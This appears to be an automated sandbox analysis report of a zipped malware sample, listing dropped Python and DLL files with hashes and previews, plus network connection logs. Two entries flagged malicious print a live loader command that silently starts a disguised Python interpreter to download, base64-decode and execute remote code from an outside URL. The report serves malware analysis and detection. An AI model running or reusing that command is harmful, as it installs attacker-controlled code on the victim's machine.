                                                                                                                                                                                                                                  Preview:o.......=..fG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....)...poll).r....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):510
                                                                                                                                                                                                                                  Entropy (8bit):5.466695229803886
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/KVLlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lBG8uaHKdAr4uY:C2RtWsrPJeMS4OjyJasv6OlBG8+1ztmm
                                                                                                                                                                                                                                  MD5:5851A2DE5B13DEE69EFCB9F1A284A039
                                                                                                                                                                                                                                  SHA1:1C12F79EB8F5516D10F94B0B6C90638072540E81
                                                                                                                                                                                                                                  SHA-256:90E02E7F06FDBCF8E24F4250F27BC74C65E7D9D531D05196018C341D163C5EDA
                                                                                                                                                                                                                                  SHA-512:809B9F4BDA7CC09FAC65C690BC4DBCCB9BFBEB3D9C139474EE1742C90EE1C2242B4AF5DFC2D450CE264EBBECC0873E511CFF6E20A9D2B1FDBA8A5D9FE0C9F5AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......l..f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....KC:\Users\Public\M20EKMMEH2\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142
                                                                                                                                                                                                                                  Entropy (8bit):4.267416930885282
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y/1LRylluleh/wZWedaHF5oXu5E5/ZqOkcTgp:y/7y/qeh/wJaHKJAu4
                                                                                                                                                                                                                                  MD5:25B73549A6DD1D083345FF6C574AC93B
                                                                                                                                                                                                                                  SHA1:DD921C11AC0B5B5268921C3C1BC621CC5C229908
                                                                                                                                                                                                                                  SHA-256:79DF944DA9CD395A864673CE780F5B1B5D66F5AC138EE0BDE2752CDD79657ED0
                                                                                                                                                                                                                                  SHA-512:65296DD0D876F941631373971E219CD38B2ECBAF85491D6B31252E86FDDCFDC3DECD7DC7BAEE59140CC5DC79C42C49A824A1614E942BA43887B1122B80C5ADA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.S.).N..r....r....r.....1C:\Users\Public\M20EKMMEH2\lib\urllib\__init__.py..<module>....s......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2864
                                                                                                                                                                                                                                  Entropy (8bit):4.910877834461308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:zSbuQshuDSkJ8eJ/53iWqgpHO26ZenDxp/mdveDI8JG/UOUPkjKbMrHoYwqmAMla:GbuyDSkJ8eJ/dmgpHF/DxwdveDI84/Ue
                                                                                                                                                                                                                                  MD5:9B29DBA052567FF45CE43CFDA2C19634
                                                                                                                                                                                                                                  SHA1:B7477B583D338500792EF60C0C3B5052C54966D6
                                                                                                                                                                                                                                  SHA-256:593D71AB5379839E65DFF64858BCBF9834AF4B48DD80A70256E4204FCB1E26AC
                                                                                                                                                                                                                                  SHA-512:5A174E3ED93FF210E3E97F7207AADD055321C9A3AA7918C115A6506AE82EDA02A609EDF83B7D8FC0A4574CADA64A5F3503021D9ED392EE4FE19822FBDD31F558
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sV...d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e.j.j...Z.G.d.d...d.e...Z.d.S.).a....Exception classes raised by urllib...The base exception class is URLError, which inherits from OSError. It.doesn't define any behavior of its own, but is the base class for all.exceptions defined in this package...HTTPError is an exception class that is also a valid HTTP response.instance. It behaves this way because HTTP protocol errors are valid.responses, with a status code, headers, and a body. In some contexts,.an application may want to handle an exception like a regular.response.......N)...URLError..HTTPError..ContentTooShortErrorc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s$...|.f.|._.|.|._.|.d.u.r.|.|._.d.S.d.S...N)...args..reason..filename)...selfr....r......r......C:\Users\Public\M20EKMMEH2\lib\urllib\error.py..__init__....s..............z.URLError.__init__c....................C...s....d
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33787
                                                                                                                                                                                                                                  Entropy (8bit):5.443140417822498
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IGxj6W55iCzXy6A9T7A7jJ7IreL5xo5Im4QfiOSMKAsrhZWB3qrwp01i3mr/Cd:IGxtqTU5cra/oLbKAkh8B3qrwapjCd
                                                                                                                                                                                                                                  MD5:BE1E9A2B3536C4FFE6654AEF09013C8A
                                                                                                                                                                                                                                  SHA1:F3C4E85AD9C6EB5A9210FC843A868E509009AA5D
                                                                                                                                                                                                                                  SHA-256:25286390147DFC80B6AE30C0F8D47E67D72130675E6E0B4DAB77404368C59837
                                                                                                                                                                                                                                  SHA-512:254AC54E7A3CA762BA17880AD735E07D30895E013B52020247A2E7B96F539B8C9831A1A251CF259D368C2BEEBECB370F5EC39FDC9D10ED9DC3CAD5753C7D496E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.d.Z.g.d...Z.d.Z.i.Z.d.d...Z.d.Z.d.Z.d.d...Z.e.e.f.d.d...Z.e.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.d.d#l.m.Z...e.d$d%..Z.e.d&d'..Z e.d(d)..Z!d*e._.d+e.j"_.d,e.j#_.d-e _.d.e j$_.d/e j%_.d0e j&_.d1e j'_.d2e j#_.d3e!_.e j$j.e!j$_.e j%j.e!j%_.e j&j.e!j&_.d4e!j(_.e j'j.e!j'_.e j#j.e!j#_.e.Z)G.d5d$..d$e.e...Z*G.d6d&..d&e e...Z+G.d7d(..d(e!e...Z,G.d8d9..d9e.e...Z-G.d:d;..d;e e...Z.G.d<d=..d=e!e...Z/d>d?..Z0e0....[0d.dBdC..Z1dDdE..Z2d.dFdG..Z3dHdI..Z4d.dJdK..Z5dLdM..Z6dNdO..Z7d.dPdQ..Z8dRdS..Z9dTZ:d.a;dUdV..Z<e..=dW..Z>d.dZd[..Z?.\.]d.d^d_..Z@.\.]d.d`da..ZAd.dbdc..ZBeCdd..ZDeEeD..ZFi.ZGG.dedf..dfe.jH..ZId.dhdi..ZJd.djdk..ZKd.dldm..ZLd\d@d.d.eKf.dndo..ZMdpdq..ZNdrds..ZOdtdu..ZPdvdw..ZQd.aRdxdy..ZSdzd{..ZTd.aUd|d}..ZVd~d...ZWd.d...ZXd.d...ZYd.d...ZZd.d...Z[d.a\d.d...Z]d.d.d...Z^d.d.d...Z_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):71349
                                                                                                                                                                                                                                  Entropy (8bit):5.431899423681214
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:6ZcvBKtoBL6sxVuJaP6IMydlT2rQuyHuQfaC6x4oinfTQcJ0:6WgtU6AI663Qu46ufMY0
                                                                                                                                                                                                                                  MD5:841215D963B9F4E5BE6F986BB49746D6
                                                                                                                                                                                                                                  SHA1:AFA3F74A012AFBE5BD126BDD9CF3BB7AF758372C
                                                                                                                                                                                                                                  SHA-256:E510CC16F0FA6EBFC837752A495A2CF7CEA7A16EF1A92D0617B2DD62710FBF97
                                                                                                                                                                                                                                  SHA-512:9E7DBEC2389E787A78B7B93CBFCCCA8B8602EB7D0B07B3DEFC0354695A00335F4777D74BB0FC2A9AB8001A44C5E988BA0CBB334BB1CBD5FF9BB9F5003FD6DF82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3478
                                                                                                                                                                                                                                  Entropy (8bit):4.754471208806924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4BaL9CzkpnMEDq/vnacKhRVH+nRsxv5C+8/15dzjT:Lxuneq33ERVHNvCl/9T
                                                                                                                                                                                                                                  MD5:AA2152E549D2BEFD6986D4C46C6C613D
                                                                                                                                                                                                                                  SHA1:87579B09E392F5EE2EC9114A8E366315802E0AA5
                                                                                                                                                                                                                                  SHA-256:1C25A8D457C09611D09C1D54A5BAA298410FE135CE878B6F3B60E2941B40AAE9
                                                                                                                                                                                                                                  SHA-512:8880C64849D12EB032797711953C61B40EC07BB59C8F87701AF9A681A7B808805275EC9355F56FFE8656753CF2A52FE34E13107EEB4CFE2BC8373274B7842376
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sZ...d.Z.d.d.l.Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a....Response classes used by urllib...The base class, addbase, defines a minimal file-like interface,.including read() and readline(). The typical response object is an.addinfourl instance, which defines an info() method that returns.headers and a geturl() method that returns the url.......N)...addbase..addclosehook..addinfo..addinfourlc........................s8...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.).r....zOBase class for addinfo and addclosehook. Is a good idea for garbage collection.c........................s ...t.t.|...j.|.d.d.d.....|.|._.d.S.).Nz.<urllib response>F)...delete)...superr......__init__..fp)...selfr........__class__...1C:\Users\Public\M20EKMMEH2\lib\urllib\response.pyr........s........z.addbase.__init__c....................C...s....d.|.j.j.t.|...|.j.f...S.).Nz.<%s at %r whose fp = %r>).r......__name__..id..file
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4143384
                                                                                                                                                                                                                                  Entropy (8bit):6.719606889163802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:0izdDWQcAdLh1ckY/wqIEh8rvZGsIBGfHP2MZnaPxQ1w7OEnGI8wgJyf:0uAk3rWBcH+MZ0Q1wlnYZJY
                                                                                                                                                                                                                                  MD5:73CADAB187AD5E06BEF954190478E3AA
                                                                                                                                                                                                                                  SHA1:18AB7B6FE86193DF108A5A09E504230892DE453E
                                                                                                                                                                                                                                  SHA-256:B4893ED4890874D0466FCA49960D765DD4C2D3948A47D69584F5CC51BBBFA4C9
                                                                                                                                                                                                                                  SHA-512:B2EBE575F3252FF7ABEBAB23FC0572FC8586E80D902D5A731FB7BD030FAA47D124240012E92FFE41A841FA2A65C7FB110AF7FB9AB6E430395A80E925283E2D4D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...............p.......jf......p.......p.......p.......}.......}...............p.......p.......pd......p......Rich............PE..L.....,d...........!......$...........$.......$...............................B......3@...@..........................%:.......:.|.....?...............?../....?.l1..(.9.T.............................9.@.............$..............................text.....$.......$................. ..`.rdata...F....$..H....$.............@..@.data.........;.......:.............@...PyRuntimh.....?.......<.............@....rsrc.........?.......<.............@..@.reloc..l1....?..2....<.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):100120
                                                                                                                                                                                                                                  Entropy (8bit):6.420724895344148
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:93b37AhIxHHWMpdPa5wiE21M8kJIGFvb1Cwv/O5sX7Sy1Px0e:977ASwMpdCq/IM8uIGf1/O5sXzx0e
                                                                                                                                                                                                                                  MD5:8AD6C16026FF6C01453D5FA392C14CB4
                                                                                                                                                                                                                                  SHA1:69535B162FF00A1454BA62D6FABA549B966D937F
                                                                                                                                                                                                                                  SHA-256:FF507B25AF4B3E43BE7E351EC12B483FE46BDBC5656BAAE6AD0490C20B56E730
                                                                                                                                                                                                                                  SHA-512:6D8042A6C8E72F76B2796B6A33978861ABA2CFD8B3F8DE2088BBFF7EA76D91834C86FA230F16C1FDDAE3BF52B101C61CB19EA8D30C6668408D86B2003ABD0967
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.)./.G./.G./.G.&...%.G.}.F.-.G.}.B.<.G.}.C.#.G.}.D...G...F.,.G.d.F.-.G./.F...G...O...G......G...E...G.Rich/.G.................PE..L.....,d.....................H......n........ ....@.................................p.....@.................................l%.......@..x5...........X.../......\....!..T...........................X!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x5...@...6... ..............@..@.reloc..\............V..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):76168
                                                                                                                                                                                                                                  Entropy (8bit):6.765544990184352
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:zHHuqvERNjBwySXtVaSvrgOFw9RxKMn5ecbCKnIY7:zHHZMRNjKySdLcOiH5ecbCKnN
                                                                                                                                                                                                                                  MD5:1A84957B6E681FCA057160CD04E26B27
                                                                                                                                                                                                                                  SHA1:8D7E4C98D1EC858DB26A3540BAAAA9BBF96B5BFE
                                                                                                                                                                                                                                  SHA-256:9FAEAA45E8CC986AF56F28350B38238B03C01C355E9564B849604B8D690919C5
                                                                                                                                                                                                                                  SHA-512:5F54C9E87F2510C56F3CF2CEEB5B5AD7711ABD9F85A1FF84E74DD82D15181505E7E5428EAE6FF823F1190964EB0A82A569273A4562EC4131CECFA00A9D0D02AA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...>|.a.........."!.........................................................@......{.....@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                                                  Entropy (8bit):5.1475603753263295
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:fw4aHW2kiyCLRoIcs21QPgABLnoDOpEiKppey:fCLRdc2PvUOGyy
                                                                                                                                                                                                                                  MD5:DC3440D753E823382C053223C86FA528
                                                                                                                                                                                                                                  SHA1:B9D45AD30539C9E5247D994356F827B35B11B35B
                                                                                                                                                                                                                                  SHA-256:204BCE75F9052A87F3C340B96B90FE72610007F0770E24ECEF4CED501E998FDF
                                                                                                                                                                                                                                  SHA-512:845D8192F8E72B3F8D20000814DCA06C9C3AEEE3CFC1883DEE0EF830F0965D6701537EA2AA0EB93E6B3A02061282DCDCBA0A84F3B2FB66B01786AF3602BC3462
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:start "" /min "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" ..
                                                                                                                                                                                                                                  Process:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):234
                                                                                                                                                                                                                                  Entropy (8bit):5.212962016667698
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:Q38w4aHW2kiyCLRoIcs21QPgABLnoDOpEiKppey:Q38CLRdc2PvUOGyy
                                                                                                                                                                                                                                  MD5:552804D1784AF1665B4C18717E09EF50
                                                                                                                                                                                                                                  SHA1:15620284AE25EFACE1B8D832EEC16320CEC7DDF4
                                                                                                                                                                                                                                  SHA-256:A2D96AF93B97A87B883AD1A7A8BA9A2DF9E7FB88B98A2F43F211D8F3623AA718
                                                                                                                                                                                                                                  SHA-512:5F6A116C6356E9D24318F8D4C2A8CDADCCC5711ABE91A8DF39AF28C73697D7BF9A9FA48C3F24A3E8D3EC397DE5ADCBB8F47366492D5781F05CF98FEB7C07C072
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:..&cls..start "" /min "C:\Users\Public\M20EKMMEH2\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" ..
                                                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15
                                                                                                                                                                                                                                  Entropy (8bit):3.7735572622751845
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:RRriov:3rb
                                                                                                                                                                                                                                  MD5:7FC149CA05FAC524FACC140040FC4ECA
                                                                                                                                                                                                                                  SHA1:787D7431F8F3E8BE035BC75BAA8F080EDF4E5E2D
                                                                                                                                                                                                                                  SHA-256:2BF2801F119A2D847AEB00F72316B7B81DC703D255DB80220F3E56A0D3D41BA4
                                                                                                                                                                                                                                  SHA-512:40981CCB2363BB77765FFCCB0321C12A06DF1681A4CF3A36CDDB9D77DD78B1A29EB098109F2C46873F6B46DD56B3839DA983201BAC3BFDF62C1444A4C5782405
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview://4mY2xzDQo= ..
                                                                                                                                                                                                                                  Process:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                                  File Type:RAR archive data, v5
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15728046
                                                                                                                                                                                                                                  Entropy (8bit):7.999563077119352
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:196608:L8mQZoP2Nv5aOfS5a/iD3o9ixqvrVODwplwYQtqk8SKmUjo8NafsfMWjTX4QRJd2:L8E2J5bS55koqsDClbQYDzmUZNnf6cJs
                                                                                                                                                                                                                                  MD5:3747B5CD3B4163FFBE3AFB797C85945E
                                                                                                                                                                                                                                  SHA1:A0F5B453D4A1A71C52FCA7371B92820CF48F8077
                                                                                                                                                                                                                                  SHA-256:F4F5D71ABC721F0E57847BE5C3DC4513D7462E2692FF1CF7BB3737DFC753D238
                                                                                                                                                                                                                                  SHA-512:BF04DA58A1E221A80314E6C66D4493C7D4928C3CCAD140876CE4E2ED79B4A41CC52F3272D66F60BB1D53419DD3E86BAE9B87CB7373736932DA49BBCDF90C98D8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:Rar!....=...............Q%..i..<........... 1....5..DLLs/libcrypto-1_1.dll0.....L..g[....elN...!....w......L%$w.s.*...*.!....jl.g....Ir/......%.|o.Z.8b2,.N.E;.7...`.u.I.x.....N(.....\.]......U.Q....tr..([.Ht...X6...A.z>...*...#..n.....80.$...o..A..1&.'..>.1.Q......8>......c....=5...d.y^.R..i...v..&..2...g[[..v). ..7....b......!Q.{.._....+...O...l.y,<<.'.%c.b......J.*../.W.Qc.#.-#.."...J.7(....>.o.K..(.v...?H...gKt.........9/H;..hx.M.~j....C....A.....@NX4...H\...r..^.{*..@}.]w........q......h.}...=.T.....:f'M.5*..2.c.vt.H.H.B.p3(/.....E.#..x'+QC........Vh.u..0.dL..O......d..0.Cb+..1~.P...MWhf.QppG.[....Rq...l(...W.D....`[@4'.7.7...X.@.....I3Z...,zt.~.o..{...L..^..F6a..[c..d0D.g.....|I.....Wl.Ai.Q..)-c..5...jH...d..oc.B..p..H4.)[."(...........R.....m.G.~...ix=v#Rb....../..S.?.J.OY.s....H....)m...z"i%J....w.....k.k.....s......;...y..Zu.....h.D .......s.x...*..VcS..>!.AS:.*(h.7]1=.'^g._.:%..).......o.m.....q...4..~/..>.12iC-.sz[.2..x.....E
                                                                                                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Entropy (8bit):7.999874653426793
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • ZIP compressed archive (8000/1) 99.91%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                                                                                                                                  File name:DzbIZ1HRMj.zip
                                                                                                                                                                                                                                  File size:103'157'485 bytes
                                                                                                                                                                                                                                  MD5:d5fbf88855ce9d2c3232a1ef0c44f11e
                                                                                                                                                                                                                                  SHA1:0db79e4ed21f179695535500ac1c362846a5b8aa
                                                                                                                                                                                                                                  SHA256:2263ecb78befde815bec4f8357ed91d5dc03d0fd587cc95ce5a62a387df26b54
                                                                                                                                                                                                                                  SHA512:6fff48cc8f1568c37b5e180a3d13eac03ad5938fd85feaca8534cb02d3fbcda8c9bfe592705b8f4296ce4f8c9d0a23e4100609a159d8d72224e29421531685d0
                                                                                                                                                                                                                                  SSDEEP:1572864:VSwYzkHf3U3RE//6PDJ1M1Lf4Uz9zHFBpYyCEVIbt8hJ8gRLmxt2XhTrYqDOrIFp:MwYgsBtPtOleEVIbt8H8gRtRXYnrIFp
                                                                                                                                                                                                                                  TLSH:943833153931FF68266A7806D7443B6C350901AEEE66CE33FB3D6791A7C48DF906C4A2
                                                                                                                                                                                                                                  File Content Preview:PK........nw.Y.............. .DzbIZ1HRMjux.............UT...P.egP.eg>.bg.....L.E.-.;...../..{v.I..<..O.J-5MF|q.9Y....axQ6....O.d........~/..3J.MSk......C..-.pzK%.8J.p_[.,.e.......#O..H.....6l:t.K.nj..J.............r4C.....;}.t..x......._...c.s...*...yB...
                                                                                                                                                                                                                                  Icon Hash:1c1c1e4e4ececedc
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.595489025 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.595524073 CET4434970652.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.595551014 CET49707443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.595603943 CET4434970752.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.595606089 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.595668077 CET49707443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.596569061 CET49707443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.596586943 CET4434970752.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.596605062 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:32.596617937 CET4434970652.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.824358940 CET4434970652.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.825963974 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.825978994 CET4434970652.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.826719046 CET4434970752.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.827090025 CET4434970652.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.827161074 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.828073978 CET49707443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.828102112 CET4434970752.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.829159021 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.829323053 CET4434970652.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.829377890 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.829404116 CET49706443192.168.2.1652.0.145.89
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.830218077 CET4434970752.0.145.89192.168.2.16
                                                                                                                                                                                                                                  Dec 20, 2024 16:26:33.830291986 CET49707443192.168.2.1652.0.145.89
